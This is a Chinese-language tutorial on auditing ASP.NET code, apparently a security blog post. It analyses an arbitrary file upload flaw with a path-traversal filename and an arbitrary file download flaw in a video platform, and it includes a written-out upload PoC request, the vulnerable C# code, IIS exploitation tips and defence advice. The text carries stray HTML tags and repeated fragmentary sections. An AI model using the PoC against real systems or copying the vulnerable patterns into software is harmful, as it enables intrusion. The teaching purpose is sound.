.NET代码审计入门教学文档<\/h1>

0x00 前言<\/h2>
本文基于某教学视频应用云平台的.NET源码审计案例，介绍.NET应用程序审计的基本方法和流程。该案例包含了文件上传和文件下载漏洞的详细分析过程。<\/p>

0x01 前置知识<\/h2>

.NET框架基础<\/h3>
.NET是微软开发的框架，支持C#、F#和Visual Basic等语言。ASP.NET是.NET框架中用于构建Web应用程序的组件。<\/p>

C#文件类型及作用<\/h3>

.aspx<\/strong>：<\/p>

ASP.NET网页文件<\/li>
包含网页标记和服务器端代码<\/li> <\/ul> <\/li>

.cs<\/strong>：<\/p>

C#源代码文件<\/li>
包含应用程序逻辑<\/li> <\/ul> <\/li>

.aspx.cs<\/strong>：<\/p>

与.aspx配套的代码文件<\/li>
处理页面服务器端逻辑<\/li> <\/ul> <\/li>

.ascx<\/strong>：<\/p>

用户控件文件<\/li>
可重复使用的UI组件<\/li> <\/ul> <\/li>

.asmx<\/strong>：<\/p>

Web服务文件<\/li>
支持SOAP通信<\/li> <\/ul> <\/li>

.asax<\/strong>：<\/p>

全局应用程序类文件<\/li>
包含全局事件处理<\/li> <\/ul> <\/li>

.dll<\/strong>：<\/p>

动态链接库<\/li>
包含已编译代码<\/li> <\/ul> <\/li> <\/ol>
文件分布结构<\/h3>
典型ASP.NET应用程序目录结构：<\/p>
\/YourWebApp \/bin YourWebApp.dll \/Pages Home.aspx Home.aspx.cs \/App_Code CommonFunctions.cs Web.config <\/code><\/pre> 反编译工具ILSpy<\/h3> 用于反编译.dll文件，查看内部代码。可从GitHub仓库获取：icsharpcode\/ILSpy<\/a><\/p> ASPX文件解析<\/h3> 典型ASPX文件首行：<\/p> <<\/span>%@ Page Language="C#" AutoEventWireup="true" CodeBehind="MyPage.aspx.cs" Inherits="MyWebApp.MyPage" %> <\/span><\/span><\/code><\/pre>关键属性：<\/p> Language<\/code>：指定编程语言<\/li> AutoEventWireup<\/code>：是否启用自动事件绑定<\/li> CodeBehind<\/code>：关联的代码文件路径<\/li> Inherits<\/code>：指定继承关系（关键审计点）<\/li> <\/ul> 0x02 文件上传漏洞分析<\/h2> 漏洞POC<\/h3> POST<\/span> \/Tools\/Video\/VideoCover.aspx HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> xxx<\/span> <\/span><\/span>[...]<\/span> <\/span><\/span>Content-Type:multipart\/form-data;boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82M <\/span><\/span> <\/span><\/span>------WebKitFormBoundaryVBf7Cs8QWsfwC82M <\/span><\/span>Content-Disposition: form-data; name="file";filename="\/..\/..\/..\/AVA.ResourcesPlatform.WebUI\/test.aspx" <\/span><\/span>Content-Type: image\/jpeg <\/span><\/span> <\/span><\/span><%@Page Language="C#"%> <\/span><\/span><% <\/span><\/span>Response.Write("test"); <\/span><\/span>%> <\/span><\/span>------WebKitFormBoundaryVBf7Cs8QWsfwC82M-- <\/span><\/span><\/code><\/pre>漏洞代码分析<\/h3> using<\/span> System; <\/span><\/span>using<\/span> System.IO; <\/span><\/span>using<\/span> System.Web; <\/span><\/span>using<\/span> System.Web.UI; <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> UploadFile<\/span> : Page <\/span><\/span>{ <\/span><\/span> protected<\/span> void<\/span> Page_Load(object<\/span> sender, EventArgs e) <\/span><\/span> { <\/span><\/span> if<\/span> (base<\/span>.Request.Files.Count <= 0<\/span>) return<\/span>; <\/span><\/span> <\/span><\/span> try<\/span> <\/span><\/span> { <\/span><\/span> HttpPostedFile httpPostedFile = base<\/span>.Request.Files[0<\/span>]; <\/span><\/span> string<\/span> fileName = httpPostedFile.FileName; <\/span><\/span> string<\/span> text = base<\/span>.Request.QueryString["VideoGuid"<\/span>]; <\/span><\/span> string<\/span> text2 = base<\/span>.Server.MapPath("~\/Upload\/Video\/"<\/span> + text + "\/"<\/span>); <\/span><\/span> <\/span><\/span> if<\/span> (!Directory.Exists(text2)) <\/span><\/span> { <\/span><\/span> Directory.CreateDirectory(text2); <\/span><\/span> } <\/span><\/span> <\/span><\/span> text2 += httpPostedFile.FileName; <\/span><\/span> httpPostedFile.SaveAs(text2); <\/span><\/span> base<\/span>.Response.Write("Success"<\/span>); <\/span><\/span> } <\/span><\/span> catch<\/span> (Exception ex) <\/span><\/span> { <\/span><\/span> base<\/span>.Response.Write(ex.Message); <\/span><\/span> } <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>漏洞成因<\/h3> 未对上传文件类型进行限制<\/li> 文件名直接拼接，未过滤..\/<\/code>等路径遍历字符<\/li> 系统目录结构导致需要跨目录上传： xxx.WebUI（前端）<\/li> xxx.AdminUI（后端，包含漏洞代码）<\/li> <\/ul> <\/li> <\/ol> 利用技巧<\/h3> 利用IIS6.0文件解析缺陷（可解析.asa、.cer等后缀）<\/li> 利用创建文件夹特性进行目录穿越<\/li> <\/ol> 0x03 文件下载漏洞分析<\/h2> 审计关键词<\/h3> Response.BinaryWrite<\/code>和SaveAs<\/code>是文件操作的关键函数<\/p> 漏洞代码<\/h3> using<\/span> System; <\/span><\/span>using<\/span> System.IO; <\/span><\/span>using<\/span> System.Web; <\/span><\/span>using<\/span> System.Web.UI; <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> Download<\/span> : Page <\/span><\/span>{ <\/span><\/span> protected<\/span> void<\/span> Page_Load(object<\/span> sender, EventArgs e) <\/span><\/span> { <\/span><\/span> string<\/span> text = base<\/span>.Request.GetFormValue("File"<\/span>).UrlDecode(); <\/span><\/span> if<\/span> (string<\/span>.IsNullOrEmpty(text)) <\/span><\/span> { <\/span><\/span> throw<\/span> new<\/span> Exception("未指明下载文件"<\/span>); <\/span><\/span> } <\/span><\/span> <\/span><\/span> string<\/span> text2 = base<\/span>.Server.MapPath("~"<\/span> + text); <\/span><\/span> if<\/span> (!File.Exists(text2)) <\/span><\/span> { <\/span><\/span> throw<\/span> new<\/span> Exception("文件不存在"<\/span>); <\/span><\/span> } <\/span><\/span> <\/span><\/span> FileInfo fileInfo = new<\/span> FileInfo(text2); <\/span><\/span> if<\/span> (!ResponseFile(Page.Request, Page.Response, fileInfo.Name, fileInfo.FullName, speed)) <\/span><\/span> { <\/span><\/span> base<\/span>.Response.Write("下载文件出错"<\/span>); <\/span><\/span> } <\/span><\/span> } <\/span><\/span> <\/span><\/span> public<\/span> bool<\/span> ResponseFile(HttpRequest hRequest, HttpResponse hResponse, <\/span><\/span> string<\/span> hfileName, string<\/span> hfullPath, long<\/span> hspeed) <\/span><\/span> { <\/span><\/span> \/\/ 文件下载实现...<\/span> <\/span><\/span> hResponse.BinaryWrite(binaryReader.ReadBytes(num2)); <\/span><\/span> \/\/ ...<\/span> <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>漏洞成因<\/h3> 未对File<\/code>参数进行过滤<\/li> 直接拼接用户输入路径<\/li> 未实施权限检查<\/li> <\/ol> 0x04 审计方法论<\/h2> 1. 定位关键文件<\/h3> 关注.dll<\/code>、.aspx<\/code>和.aspx.cs<\/code>文件<\/li> 通过Inherits<\/code>属性追踪代码位置<\/li> <\/ul> 2. 反编译分析<\/h3> 使用ILSpy反编译.dll文件<\/li> 导出为.cs文件便于分析<\/li> <\/ol> 3. 关键词搜索<\/h3> 常用审计关键词：<\/p> 文件操作：SaveAs<\/code>、BinaryWrite<\/code>、FileStream<\/code><\/li> 命令执行：Process.Start<\/code>、System.Diagnostics<\/code><\/li> 反序列化：BinaryFormatter<\/code>、JavaScriptSerializer<\/code><\/li> 数据库操作：SqlCommand<\/code>、ExecuteNonQuery<\/code><\/li> <\/ul> 4. 路由分析<\/h3> 通过.aspx文件定位处理逻辑<\/li> 关注Page_Load<\/code>方法（入口点）<\/li> <\/ul> 5. 漏洞验证<\/h3> 搭建测试环境<\/li> 构造POC验证<\/li> 分析防护机制（如有）<\/li> <\/ol> 0x05 其他潜在漏洞<\/h2> 根据案例，该系统还可能存在：<\/p> SSRF（服务器端请求伪造）<\/li> 未授权访问<\/li> 反序列化漏洞<\/li> SQL注入（需检查数据库操作）<\/li> <\/ol> 0x06 防御建议<\/h2> 文件上传：<\/p> 验证文件类型（白名单）<\/li> 重命名上传文件<\/li> 限制上传目录<\/li> 过滤路径遍历字符<\/li> <\/ul> <\/li> 文件下载：<\/p> 验证文件路径<\/li> 实施权限检查<\/li> 限制下载目录<\/li> <\/ul> <\/li> 通用防御：<\/p> 输入验证<\/li> 输出编码<\/li> 最小权限原则<\/li> 安全配置（如IIS）<\/li> <\/ul> <\/li> <\/ol> 0x07 总结<\/h2> 本案例展示了.NET应用程序审计的基本流程：<\/p> 通过文件类型和结构了解系统架构<\/li> 使用ILSpy等工具反编译分析<\/li> 关键词搜索定位潜在漏洞<\/li> 分析代码逻辑验证漏洞<\/li> 了解利用方式和影响范围<\/li> <\/ol> .NET审计需要熟悉C#语言特性和.NET框架机制，掌握常见漏洞模式和审计技巧。<\/p>

.NET代码审计入门教学文档<\/h1>

0x00 前言<\/h2> 本文基于某教学视频应用云平台的.NET源码审计案例，介绍.NET应用程序审计的基本方法和流程。该案例包含了文件上传和文件下载漏洞的详细分析过程。<\/p>

0x01 前置知识<\/h2>

.NET框架基础<\/h3> .NET是微软开发的框架，支持C#、F#和Visual Basic等语言。ASP.NET是.NET框架中用于构建Web应用程序的组件。<\/p>

反编译工具ILSpy<\/h3> 用于反编译.dll文件，查看内部代码。可从GitHub仓库获取：icsharpcode\/ILSpy<\/a><\/p>

0x02 文件上传漏洞分析<\/h2>

0x03 文件下载漏洞分析<\/h2>

审计关键词<\/h3> Response.BinaryWrite<\/code>和SaveAs<\/code>是文件操作的关键函数<\/p>

0x04 审计方法论<\/h2>

0x00 前言<\/h2>
本文基于某教学视频应用云平台的.NET源码审计案例，介绍.NET应用程序审计的基本方法和流程。该案例包含了文件上传和文件下载漏洞的详细分析过程。<\/p>

.NET框架基础<\/h3>
.NET是微软开发的框架，支持C#、F#和Visual Basic等语言。ASP.NET是.NET框架中用于构建Web应用程序的组件。<\/p>

反编译工具ILSpy<\/h3>
用于反编译.dll文件，查看内部代码。可从GitHub仓库获取：icsharpcode\/ILSpy<\/a><\/p>

审计关键词<\/h3>
`Response.BinaryWrite<\/code>和SaveAs<\/code>是文件操作的关键函数<\/p>`